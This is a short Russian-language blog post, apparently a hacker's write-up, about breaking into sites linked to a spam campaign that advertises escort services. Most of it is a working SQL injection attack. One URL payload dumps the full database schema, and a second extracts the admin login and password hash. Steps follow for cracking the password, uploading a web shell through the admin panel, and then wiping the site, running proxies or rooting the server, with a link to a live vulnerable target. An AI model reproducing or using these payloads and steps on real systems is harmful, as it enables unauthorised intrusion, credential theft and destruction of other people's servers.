И снова о девочках

В прошлой заметке уже обсуждался вопрос спама kronus.me ссылками на сайты с «девочками». Тогда ограничились дефейсом одного сайта.

Сейчас надо бы копнуть поглубже (ouch!). Для начала посмотрим, что еще есть на сервере. Идем на 2ip.ru и получаем список сайтов:

Наш «эксплоит» выглядит так (как раскручивать инъекцию — дело ваше):

http://DOMAIN/?page=content&content_id=-1'+union+select+1,2,(@n),4,5,6+FROM(SELECT@n:=0x20,(SELECT(CONCAT(@a:=table_schema,@b:=TABLE_NAME,@c:=0x3c62723e,@d:=0x2d2d2d,@s:=0x2028,@q:=0x29,@n:=CONCAT(0x3c7072653e,@a,@s,(SELECT(COUNT(*))FROM(information_schema.TABLES)WHERE(table_schema=@a)),@q,@c,@d,@b,@s,IFNULL((SELECT(table_rows)FROM(information_schema.TABLES)WHERE(TABLE_NAME=@b)),0x2d),@q)))FROM(information_schema.TABLES)LIMIT/**/1),(SELECT(COUNT(*))FROM(information_schema.COLUMNS)WHERE(@n:=CONCAT_WS(@c,@n,CONCAT(IF(TABLE_NAME!=@b,(IF(table_schema!=@a,(SELECT(CONCAT(@a:=table_schema,@s,(SELECT(COUNT(*))FROM(information_schema.TABLES)WHERE(table_schema=(@a))),@q,@c,@d,@b:=TABLE_NAME,@s,IFNULL((SELECT(table_rows)FROM(information_schema.TABLES)WHERE(TABLE_NAME=@b)AND(table_schema=@a)),0x2d),@q,@c,0x2d))),(SELECT(CONCAT(@d,@b:=TABLE_NAME,@s,IFNULL((SELECT(table_rows)FROM(information_schema.TABLES)WHERE(TABLE_NAME=@b)AND(table_schema=@a)),0x2d),@q,@c,0x2d))))),(IF(table_schema!=@a,(SELECT(CONCAT(@a:=table_schema,@s,(SELECT(COUNT(*))FROM(information_schema.TABLES)WHERE(table_schema=(@a))),@q,@c,@d,@b:=TABLE_NAME,@s,IFNULL((SELECT(table_rows)FROM(information_schema.TABLES)WHERE(TABLE_NAME=@b)AND(table_schema=@a)),0x2d),@q,@c,0x2d))),(SELECT(0x2d))))),0x2d2d2d2d2d,column_name)))%3E0))a+--+

«Живой» пример — http://bit.ly/14GNPf3.

Берем каждый домен и проверяем. Получаем структуру БД уязвимого сайта. Данные по логину/паролю админа будут тут:

http://DOMAIN/?page=content&content_id=-1'+union+select+1,2,concat_ws(0x3a3a3a,admin_login,admin_pass),4,5,6+from+admins+limit+1+--+

Подбираем пароль в каком-нибудь сервисе. Заходим в админку (admin.html) и идем в «Языки». Там заливаем шелл. Дальше уже дело ваше, что и как делать: можно снести все к чертям, можно проксики поднять, можно сервер порутать и т.д.

Мораль (даже несколько): спам — это плохо; «девочек» лучше вживую смотреть (в Амстердаме, например), а не на размытых фото; лучше не пользоваться услугами «девочек».

Оставить комментарий

Top ↑ | Main page | Back